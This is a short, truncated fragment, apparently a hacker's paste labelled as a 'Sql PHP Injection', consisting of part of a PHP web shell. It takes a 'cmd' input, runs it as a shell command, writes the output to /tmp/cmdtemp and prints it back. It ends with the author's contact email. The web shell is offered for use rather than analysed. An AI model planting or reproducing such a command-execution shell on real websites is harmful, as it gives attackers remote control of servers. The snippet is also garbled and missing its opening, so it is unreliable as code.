A^D^A^M Sql PHP Injection :

"> cmd :

---

 /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>

---

email : adam.hawa@gmail.com